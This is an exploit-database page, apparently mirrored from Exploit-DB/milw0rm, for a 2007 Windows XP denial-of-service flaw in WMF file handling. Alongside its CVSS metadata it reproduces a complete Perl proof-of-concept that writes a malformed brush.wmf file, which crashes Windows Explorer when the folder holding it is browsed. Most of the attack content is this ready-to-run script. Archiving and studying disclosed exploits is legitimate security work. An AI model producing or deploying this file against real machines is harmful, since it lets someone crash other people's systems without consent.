header-logo
Suggest Exploit
vendor:
Windows XP
by:
cyanid-E
5.5
CVSS
MEDIUM
Denial of Service
200
CWE
Product Name: Windows XP
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP
2007

WMF PoC denial of service exploit

This is a proof-of-concept exploit for a denial of service vulnerability in Windows Metafile Format (WMF) files. It generates a malicious WMF file that can cause the Windows Explorer in Windows XP to crash when browsing a folder containing the file.

Mitigation:

There is no specific mitigation mentioned in the text.
Source

Exploit-DB raw data:

#!/usr/bin/perl

print "\nWMF PoC denial of service exploit by cyanid-E <biz4rre\@gmail.com>";
print "\n\ngenerating brush.wmf...";
open(WMF, ">./brush.wmf") or die "cannot create wmf file\n";
print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x61\x6E\x69\x64";
print WMF "\x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "ok\n\nnow try to browse folder in XP explorer and wait :)\n";

# milw0rm.com [2007-01-13]

Navigation

Suggest Exploit

Services By CQR